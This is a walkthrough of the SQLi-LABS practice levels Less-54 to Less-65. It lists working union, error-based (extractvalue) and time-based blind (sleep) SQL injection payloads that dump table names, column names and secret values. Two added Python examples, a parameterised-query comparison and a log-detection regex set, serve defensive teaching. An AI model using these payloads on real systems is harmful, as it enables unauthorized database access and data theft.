SQLi-LABS Practice Range: Write-up for Less-54 to Less-65
Less-54 (GET - challenge - Union - 10 queries allowed - Variation 1)
$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";
This level is still a string-type injection (single-quote closure), but only ten attempts are allowed.
The table name, password and so on are forcibly regenerated after every ten attempts.
Since we already know the database is called challenges, the next thing we need is the table name.
Dump the database name:
?id=-1' union select 1,2,database() --+
challenges
Dump the table name:
?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+
8aklv5t3d6
Dump the column names:
?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='8aklv5t3d6' --+
Guess that secret_2YSJ is the key.
Dump the value:
?id=-1' union select 1,2,group_concat(secret_2YSJ) from challenges.8aklv5t3d6 --+
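As an added example (not code from sqli-labs or this write-up), the string-built query behind Less-54 to Less-57 is shown next to a parameterised version, on an in-memory SQLite stand-in with constructed table and column names: the four levels differ only in the wrapper around $id, and binding the value makes that wrapper irrelevant.

```python
import re
import sqlite3

def setup() -> sqlite3.Connection:
    # Constructed stand-in for security.users and the random challenges table.
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE users(id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'Dumb', 'Dumb');
        CREATE TABLE t_secret(id INTEGER, secret_key TEXT);
        INSERT INTO t_secret VALUES (1, 'constructed-flag-value');
    """)
    return con

# The lab splices $id into the SQL text; each level only changes the characters
# around it, which is why the payload's closing characters change per level.
WRAPPERS = {
    "Less-54": "'{id}'",     # id='$id'
    "Less-55": "({id})",     # id=($id)
    "Less-56": "('{id}')",   # id=('$id')
    "Less-57": '"{id}"',     # id="$id"
}

def query_concat(con: sqlite3.Connection, level: str, id_value: str):
    # Vulnerable form: the value becomes part of the SQL grammar, so a crafted
    # value can end the literal and append a UNION (the lab's behaviour).
    sql = "SELECT * FROM users WHERE id=" + WRAPPERS[level].format(id=id_value) + " LIMIT 1"
    return con.execute(sql).fetchall()

def query_param(con: sqlite3.Connection, id_value: str):
    # Hardened form: validate the type first, then bind. A bound parameter is
    # never parsed as SQL, so quotes and parentheses in it have no effect.
    if not re.fullmatch(r"-?\d+", id_value):
        raise ValueError("id must be an integer")
    return con.execute("SELECT * FROM users WHERE id=? LIMIT 1", (int(id_value),)).fetchall()
```

The attempt limit the level imposes does not change either outcome; only the parameterised form removes the injection.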
Less-55 (GET - challenge - Union - 14 queries allowed - Variation 2)
$sql="SELECT * FROM security.users WHERE id=($id) LIMIT 0,1";
Same approach as Less-54, except there is an extra parenthesis to close: ?id=0) . 14 attempts are allowed.
Dump the table name:
?id=-1) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+
gbk3yw2slw
Dump the column names:
?id=-1) union select 1,2,group_concat(column_name) from information_schema.columns where table_name='gbk3yw2slw' --+
secret_ECLS
Dump the value:
?id=-1) union select 1,2,group_concat(secret_ECLS) from gbk3yw2slw --+
Less-56 (GET - challenge - Union - 14 queries allowed - Variation 3)
$sql="SELECT * FROM security.users WHERE id=('$id') LIMIT 0,1";
Same approach as Less-54 and Less-55, except the closure needs a single quote and a parenthesis: ?id=0') . 14 attempts are allowed.
Dump the table name:
?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+
gbk3yw2slw
Dump the column names:
?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='gbk3yw2slw' --+
secret_ECLS
Dump the value:
?id=-1') union select 1,2,group_concat(secret_ECLS) from gbk3yw2slw --+
Less-57 (GET - challenge - Union - 14 queries allowed - Variation 4)
$id= '"'.$id.'"';
// Query DB to get the correct output
$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";
Same approach as above, except $id is wrapped as '"'.$id.'"', so the closure here is a double quote.
Dump the table name:
?id=-1" union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+
Dump the column names:
?id=-1" union select 1,2,group_concat(column_name) from information_schema.columns where table_name='gbk3yw2slw' --+
Dump the value:
?id=-1" union select 1,2,group_concat(secret_ECLS) from gbk3yw2slw --+
Less-58 (GET - challenge - Double Query - 5 queries allowed - Variation 1)
$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";
After the SQL statement executes, the page does not display any data from the database, so union-based injection cannot be used here; use error-based injection instead.
Dump the table name:
?id=-1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) --+
na84sqpzf1
Dump the column names:
?id=-1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='na84sqpzf1'))) --+
secret_H21F
Dump the value:
?id=-1' and extractvalue(1,concat(0x7e,(select group_concat(secret_H21F) from na84sqpzf1))) --+
yCeBdWLEcQBb9swXSgwxGsKf
Less-59 (GET - challenge - Double Query - 5 queries allowed - Variation 2)
$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";
Same as Less-58, only without the single quote.
Dump the table name:
?id=-1 and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) --+
ir2kngnqlg
Dump the column names:
?id=-1 and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='ir2kngnqlg'))) --+
secret_VFU4
Dump the value:
?id=-1 and extractvalue(1,concat(0x7e,(select group_concat(secret_VFU4) from ir2kngnqlg))) --+
FgW73MnkRN6zQFoMJF8lB2hx
Less-60 (GET - challenge - Double Query - 5 queries allowed - Variation 3)
$id = '("'.$id.'")';
// Query DB to get the correct output
$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";
Same as Less-59, except with an extra double quote and parenthesis: ?id=-1")
Dump the table name:
?id=-1") and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) --+
qwo4md2ykm
Dump the column names:
?id=-1") and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='qwo4md2ykm'))) --+
secret_PIER
Dump the value:
?id=-1") and extractvalue(1,concat(0x7e,(select group_concat(secret_PIER) from qwo4md2ykm))) --+
5dbmmA4u4BmYhuqSnUvW7VzR
Less-61 (GET - challenge - Double Query - 5 queries allowed - Variation 4)
$sql="SELECT * FROM security.users WHERE id=(('$id')) LIMIT 0,1";
Same as above, except with two parentheses and a single quote to close: ?id=-1'))
Dump the table name:
?id=-1')) and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) --+
aakl60y1i1
Dump the column names:
?id=-1')) and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='aakl60y1i1'))) --+
secret_VHWW
Dump the value:
?id=-1')) and extractvalue(1,concat(0x7e,(select group_concat(secret_VHWW) from aakl60y1i1))) --+
bGSX0wP4UeitlxG5b6BRtzMe
Less-62 (GET - challenge - Blind - 130 queries allowed - Variation 1)
$sql="SELECT * FROM security.users WHERE id=('$id') LIMIT 0,1";
Here both union-based and error-based injection no longer work, so we have to use time-based injection.
?id=1') and If(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))=79,0,sleep(10)) --+
When the guess is correct the response comes back quickly; when it is wrong the response takes more than 10 seconds, so a script can be used to automate the attempts.
First, find out how many tables there are in the database.
Using
?id=1') and if((select count(*) from information_schema.tables where table_schema=database())=1,sleep(5),1) --+
we can determine that the challenges database contains only one table.
Determine the table name length, then the table name:
?id=1') and if(length((select table_name from information_schema.tables where table_schema=database()))=10,sleep(5),1) --+
This shows the table name is 10 characters long.
?id=1') and if(ascii(substr((select table_name from information_schema.tables where table_schema=database()),1,1))=54,sleep(5),1) --+
This statement shows that the first character of the table name has ASCII code 54, i.e. the character 6.
Determine the columns
select count(*) from information_schema.tables where table_schema=database() and table_name="69qpriqcgb"
In the same way, using statements of the form above, we determine that table 69qpriqcgb (the table name is randomly generated) has 4 columns.
select column_name from information_schema.columns where table_schema=database() and table_name="69qpriqcgb" limit 0,1
Less-63 (GET - challenge - Blind - 130 queries allowed - Variation 2)
$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";
Same as Less-62, only with a single-quote closure.
payload: ?id=0%27and%20If(ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27challenges%27),1,1))=77,0,sleep(10))--+
Correct guess: short response time; wrong guess: long response time.
Less-64 (GET - challenge - Blind - 130 queries allowed - Variation 3)
$sql="SELECT * FROM security.users WHERE id=(($id)) LIMIT 0,1";
Same as Less-63, only with a double-parenthesis closure.
payload: ?id=0))and%20If(ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27challenges%27),1,1))=77,0,sleep(10))--+
Correct guess: short response time; wrong guess: long response time.
Less-65 (GET - challenge - Blind - 130 queries allowed - Variation 4)
$id = '"'.$id.'"';
// Query DB to get the correct output
$sql="SELECT * FROM security.users WHERE id=($id) LIMIT 0,1";
Same as above, only the closure is ?id=1")
payload: ?id=1%22)and%20If(ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27challenges%27),1,1))=79,0,sleep(10))--+
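The three request families this write-up walks through (union with information_schema, error-based via extractvalue(), time-based via if()/sleep()) leave a recognisable shape in web server logs. The following added example, which is not part of the write-up, classifies constructed access-log lines by family after URL-decoding the query string; the log lines, IPs and paths are made up.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log sample: one benign request per level plus a
# non-malicious search that happens to contain the word "union".
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /Less-54/?id=1 HTTP/1.1" 200 812
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /Less-54/?id=-1%27%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()%20--+ HTTP/1.1" 200 845
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /Less-58/?id=-1%27%20and%20extractvalue(1,concat(0x7e,(select%20group_concat(table_name)%20from%20information_schema.tables)))%20--+ HTTP/1.1" 200 603
10.0.0.5 - - [01/Jan/2024:10:00:14 +0000] "GET /Less-62/?id=1%27)%20and%20if(ascii(substr((select%20table_name%20from%20information_schema.tables),1,1))=54,sleep(5),1)%20--+ HTTP/1.1" 200 812
10.0.0.9 - - [01/Jan/2024:10:00:20 +0000] "GET /search?q=union%20station HTTP/1.1" 200 2048
"""

REQ_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

# One regex per family, applied to the decoded, lower-cased request. \s* keeps
# %20 / + / tab spacing variants together; the union rule requires both a
# SELECT and an information_schema reference to avoid matching ordinary text.
FAMILIES = {
    "union": re.compile(r"union\s+(?:all\s+)?select\b.*information_schema"),
    "error-based": re.compile(r"\b(?:extractvalue|updatexml)\s*\(.*\bconcat\s*\("),
    "time-based": re.compile(r"\bif\s*\(.*\bsleep\s*\("),
}

def normalize(url: str) -> str:
    # Decode twice: the write-up encodes quotes and spaces once, but double
    # encoding is a common way to slip past single-pass filters.
    return unquote_plus(unquote_plus(url)).lower()

def classify(line: str):
    """Return the list of families matched by one log line ([] if none)."""
    m = REQ_RE.search(line)
    if not m:
        return []
    decoded = normalize(m.group(1))
    return [name for name, rx in FAMILIES.items() if rx.search(decoded)]

def scan(log: str):
    """Return [(client_ip, path, families)] for every line that hits a family."""
    out = []
    for line in log.splitlines():
        hits = classify(line)
        if hits:
            ip = line.split(" ", 1)[0]
            path = REQ_RE.search(line).group(1).split("?", 1)[0]
            out.append((ip, path, hits))
    return out
```

Pairing the time-based hits with the response-time field of the log (where the server records one) separates a real sleep() delay from a slow page.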